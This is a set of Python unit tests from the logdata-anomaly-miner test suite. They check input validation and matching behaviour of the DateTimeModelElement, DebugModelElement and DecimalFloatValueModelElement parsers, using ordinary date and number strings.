self.assertRaises(TypeError, DateTimeModelElement, [], date_format) # empty list element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, (), date_format) # empty tuple element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, set(), date_format) # empty set element_id is not allowed def test19date_format_input_validation(self): """Check if date_format is validated and only valid values can be entered.""" allowed_format_specifiers = b"bdfHMmSsYz%" # check if allowed values do not raise any exception. format_specifiers = b"" for c in allowed_format_specifiers: format_specifiers += b"%" + str(chr(c)).encode() DateTimeModelElement(self.id_, b"%" + str(chr(c)).encode()) # check if all allowed values can not be used together. An exception should be raised, because of multiple month representations # and %s with non-second formats. self.assertRaises(ValueError, DateTimeModelElement, self.id_, format_specifiers) DateTimeModelElement(self.id_, format_specifiers.replace(b"%m", b"").replace(b"%s", b"")) DateTimeModelElement(self.id_, format_specifiers.replace(b"%b", b"").replace(b"%s", b"")) DateTimeModelElement(self.id_, b"%s%z%f") for c in allowed_format_specifiers.replace(b"s", b"").replace(b"z", b"").replace(b"f", b"").replace(b"%", b""): self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%s%" + str(chr(c)).encode()) # test non-existent specifiers for c in b"aceghijklnopqrtuvwxyABCDEFGIJKLNOPQRTUVWXZ": self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%" + str(chr(c)).encode()) # test multiple specifiers. % and z specifiers are allowed multiple times. DateTimeModelElement(self.id_, b"%%%z%z") for c in allowed_format_specifiers.replace(b"%", b"").replace(b"z", b""): self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%" + str(chr(c)).encode() + b"%" + str(chr(c)).encode()) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"") # empty date_format self.assertRaises(TypeError, DateTimeModelElement, self.id_, None) # None date_format self.assertRaises(TypeError, DateTimeModelElement, self.id_, "") # string date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, 123) # integer date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, 123.22) # float date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, True) # boolean date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, {"id": "path"}) # dict date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, ["path"]) # list date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, []) # empty list date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, ()) # empty tuple date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, set()) # empty set date_format is not allowed def test20time_zone_input_validation(self): """Check if time_zone is validated and only valid values can be entered.""" dtme = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S") self.assertEqual(dtme.time_zone, timezone.utc) DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc) for tz in pytz.all_timezones: DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", pytz.timezone(tz)) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", b"UTC") self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", "UTC") self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", 1) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", 1.25) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", True) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", {"time_zone": timezone.utc}) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", [timezone.utc]) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", []) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", set()) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", ()) def test21text_locale_input_validation(self): """ Check if text_locale is validated and only valid values can be entered. An exception has to be raised if the locale is not installed on the system. """ DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, "en_US.UTF-8") DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, ("en_US", "UTF-8")) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, 1) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, 1.2) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, True) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, ["en_US", "UTF-8"]) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, {"en_US": "UTF-8"}) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, tuple("en_US.UTF-8")) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, set()) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, ()) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, ("en_US", "UTF-8", "de_AT", "UTF-8")) def test22start_year_input_validation(self): """Check if start_year is validated.""" dtme = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, None, None) self.assertEqual(dtme.start_year, datetime.now().year) DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, 2020) DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, -630) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, "2020") self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, True) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, 1.25) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, [2020]) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, []) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, {"key": 2020}) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, set()) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, ()) def test23max_time_jump_seconds_input_validation(self): """Check if max_time_jump_seconds is validated.""" dtme = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, None, None) self.assertEqual(dtme.max_time_jump_seconds, 86400) DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, 100000) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, -1) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, 0) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, "100000") self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, True) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, 1.25) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, [2020]) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, []) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, {"key": 2020}) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, ()) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, set()) def test24get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S") data = b"07.02.2019 11:40:00: it still works" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) def test25performance(self): """Test the performance of the implementation.""" run_test = False import_setup = """ import copy from unit.TestBase import DummyMatchContext from aminer.parsing.DateTimeModelElement import DateTimeModelElement times = 100000 """ string_no_z_setup = """ date = b"[18/Oct/2021:16:12:55" dtme = DateTimeModelElement("s0", b"[%d/%b/%Y:%H:%M:%S") """ string_z1_setup = """ date = b"[18/Oct/2021:16:12:55 UTC+0100" dtme = DateTimeModelElement("s0", b"[%d/%b/%Y:%H:%M:%S%z") """ string_z2_setup = """ date = b"[18/Oct/2021:16:12:55 +0000]" dtme = DateTimeModelElement("s0", b"[%d/%b/%Y:%H:%M:%S%z") """ end_setup = """ dummy_match_context = DummyMatchContext(date) dummy_match_context_list = [copy.deepcopy(dummy_match_context) for _ in range(times)] def run(): match_context = dummy_match_context_list.pop(0) dtme.get_match_element("match", match_context) """ no_z_setup = import_setup + string_no_z_setup + end_setup z1_setup = import_setup + string_z1_setup + end_setup z2_setup = import_setup + string_z2_setup + end_setup if run_test: import timeit times = 100000 print() print("Every date is run %d times." % times) t = timeit.timeit(setup=no_z_setup, stmt="run()", number=times) print("No %z parameter ([18/Oct/2021:16:12:55): ", t) t = timeit.timeit(setup=z1_setup, stmt="run()", number=times) print("Date with %z parameter (18/Oct/2021:16:12:55 UTC+0100): ", t) t = timeit.timeit(setup=z2_setup, stmt="run()", number=times) print("Date with %z parameter (18/Oct/2021:16:12:55 +0000): ", t) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/DebugModelElementTest.py000066400000000000000000000110471500476301700301610ustar00rootroot00000000000000import unittest import sys from _io import StringIO from aminer.parsing.DebugModelElement import DebugModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class DebugModelElementTest(TestBase): """Unittests for the DebugModelElement.""" id_ = "debug" path = "path" def test1get_match_element_valid_match(self): """Parse data and check if the MatchContext was not changed.""" old_stderr = sys.stderr output = StringIO() sys.stderr = output debug_model_element = DebugModelElement(self.id_) self.assertEqual(output.getvalue(), "DebugModelElement %s added\n" % self.id_) output.seek(0) output.truncate(0) data = b"some data" match_context = DummyMatchContext(data) match_element = debug_model_element.get_match_element(self.path, match_context) self.assertEqual( output.getvalue(), 'DebugModelElement path = "%s", unmatched = "%s"\n' % (match_element.get_path(), repr( match_context.match_data))) self.compare_match_results(data, match_element, match_context, self.id_, self.path, b"", b"", None) output.seek(0) output.truncate(0) data = b"123 0x2a. [\"abc\"]:" match_context = DummyMatchContext(data) match_element = debug_model_element.get_match_element(self.path, match_context) self.assertEqual( output.getvalue(), 'DebugModelElement path = "%s", unmatched = "%s"\n' % (match_element.get_path(), repr( match_context.match_data))) self.compare_match_results(data, match_element, match_context, self.id_, self.path, b"", b"", None) sys.stderr = old_stderr def test2element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, DebugModelElement, "") # empty element_id self.assertRaises(TypeError, DebugModelElement, None) # None element_id self.assertRaises(TypeError, DebugModelElement, b"path") # bytes element_id is not allowed self.assertRaises(TypeError, DebugModelElement, True) # bool element_id is not allowed self.assertRaises(TypeError, DebugModelElement, 123) # integer element_id is not allowed self.assertRaises(TypeError, DebugModelElement, 123.22) # float element_id is not allowed self.assertRaises(TypeError, DebugModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, DebugModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, DebugModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, DebugModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, DebugModelElement, set()) # empty set element_id is not allowed def test3get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = DebugModelElement(self.id_) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/DecimalFloatValueModelElementTest.py000066400000000000000000000655201500476301700324610ustar00rootroot00000000000000import unittest from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class DecimalFloatValueModelElementTest(TestBase): """Unittests for the DecimalFloatValueModelElement.""" id_ = "float" path = "path" def test1get_match_element_default_values(self): """Test valid float values with default values of value_sign_type, value_pad_type and exponent_type.""" decimal_float_value_me = DecimalFloatValueModelElement( self.id_, DecimalFloatValueModelElement.SIGN_TYPE_NONE, DecimalFloatValueModelElement.PAD_TYPE_NONE, DecimalFloatValueModelElement.EXP_TYPE_NONE) data = b"22.25 some string." value = b"22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.25, None) data = b"0.25 some string." value = b"0.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0.25, None) data = b"22 some string." value = b"22" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"22.12.2021 some string." value = b"22.12" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.12, None) data = b"22. some string" value = b"22." match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.0, None) data = b"0 some string" value = b"0" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) def test2get_match_element_default_values_no_match(self): """Test not matching values with default values of value_sign_type, value_pad_type and exponent_type.""" decimal_float_value_me = DecimalFloatValueModelElement( self.id_, DecimalFloatValueModelElement.SIGN_TYPE_NONE, DecimalFloatValueModelElement.PAD_TYPE_NONE, DecimalFloatValueModelElement.EXP_TYPE_NONE) data = b"+22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"-22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"22,25" value = b"22" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b".25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"025" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"0025" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" 25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" 25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"1e-5" value = b"1" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"e+10" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"1e+0" value = b"1" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"00" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3get_match_element_optional_zero_values(self): """Test valid float values with "optional" or "zero" values of value_sign_type, value_pad_type and exponent_type.""" decimal_float_value_me = DecimalFloatValueModelElement( self.id_, DecimalFloatValueModelElement.SIGN_TYPE_OPTIONAL, DecimalFloatValueModelElement.PAD_TYPE_ZERO, DecimalFloatValueModelElement.EXP_TYPE_OPTIONAL) data = b"22.25 some string." value = b"22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.25, None) data = b"-22.25 some string." value = b"-22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, -22.25, None) data = b"0.25 some string." value = b"0.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0.25, None) data = b"22 some string." value = b"22" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"22.12.2021 some string." value = b"22.12" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.12, None) data = b"22. some string" value = b"22." match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.0, None) data = b"025 some string" value = b"025" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 25, None) data = b"0025 some string" value = b"0025" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 25, None) data = b"0025.22 some string" value = b"0025.22" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 25.22, None) data = b"1e-5 some string" value = b"1e-5" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1e-5, None) data = b"1e+0 some string" value = b"1e+0" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"0 some string" value = b"0" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) data = b"00 some string" value = b"00" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) def test4get_match_element_optional_zero_values_no_match(self): """Test not matching values with default values of value_sign_type, value_pad_type and exponent_type.""" decimal_float_value_me = DecimalFloatValueModelElement( self.id_, DecimalFloatValueModelElement.SIGN_TYPE_OPTIONAL, DecimalFloatValueModelElement.PAD_TYPE_ZERO, DecimalFloatValueModelElement.EXP_TYPE_OPTIONAL) data = b"+22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"22,25" value = b"22" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b".25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" 25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" 25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"e+10" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test5get_match_element_mandatory_blank_values(self): """Test valid float values with "mandatory" or "blank" values of value_sign_type, value_pad_type and exponent_type.""" decimal_float_value_me = DecimalFloatValueModelElement( self.id_, DecimalFloatValueModelElement.SIGN_TYPE_MANDATORY, DecimalFloatValueModelElement.PAD_TYPE_BLANK, DecimalFloatValueModelElement.EXP_TYPE_MANDATORY) data = b"+22.25e-5 some string." value = b"+22.25e-5" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0.0002225, None) data = b"-22.25e+5 some string." value = b"-22.25e+5" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, -2225000, None) data = b"+0.25e+1 some string." value = b"+0.25e+1" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 2.5, None) data = b"+22e-3 some string." value = b"+22e-3" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0.022, None) data = b"+22e-5. some string" value = b"+22e-5" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0.000220, None) data = b"+ 25e+1 some string" value = b"+ 25e+1" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 250, None) data = b"- 25e-17 some string" value = b"- 25e-17" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, -25e-17, None) data = b"+22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"+1e-5 some string" value = b"+1e-5" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1e-5, None) data = b"+1e+0 some string" value = b"+1e+0" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"+ 1e+0 some string" value = b"+ 1e+0" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"+0e-3 some string" value = b"+0e-3" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) def test6get_match_element_mandatory_blank_values_no_match(self): """Test not matching values with default values of value_sign_type, value_pad_type and exponent_type.""" decimal_float_value_me = DecimalFloatValueModelElement( self.id_, DecimalFloatValueModelElement.SIGN_TYPE_MANDATORY, DecimalFloatValueModelElement.PAD_TYPE_BLANK, DecimalFloatValueModelElement.EXP_TYPE_OPTIONAL) data = b"22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"+ 22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"- 22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"+22,25" value = b"+22" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"22,25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"22.12.2021 some string." match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b".25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" +25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" -25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"025" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"0025" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"e+10" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"00" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test7element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, DecimalFloatValueModelElement, "") # empty element_id self.assertRaises(TypeError, DecimalFloatValueModelElement, None) # None element_id self.assertRaises(TypeError, DecimalFloatValueModelElement, b"path") # bytes element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, True) # bool element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, 123) # integer element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, 123.22) # float element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, set()) # empty set element_id is not allowed def test8value_sign_type_input_validation(self): """Check if value_sign_type is validated.""" DecimalFloatValueModelElement(self.id_, value_sign_type="none") DecimalFloatValueModelElement(self.id_, value_sign_type="optional") DecimalFloatValueModelElement(self.id_, value_sign_type="mandatory") self.assertRaises(ValueError, DecimalFloatValueModelElement, self.id_, value_sign_type="None") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=None) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=b"none") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=True) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=123) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=123.22) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type={"value_sign_type": "none"}) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=["none"]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=[]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=()) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=set()) def test9value_pad_type_input_validation(self): """Check if value_pad_type is validated.""" DecimalFloatValueModelElement(self.id_, value_pad_type="none") DecimalFloatValueModelElement(self.id_, value_pad_type="zero") 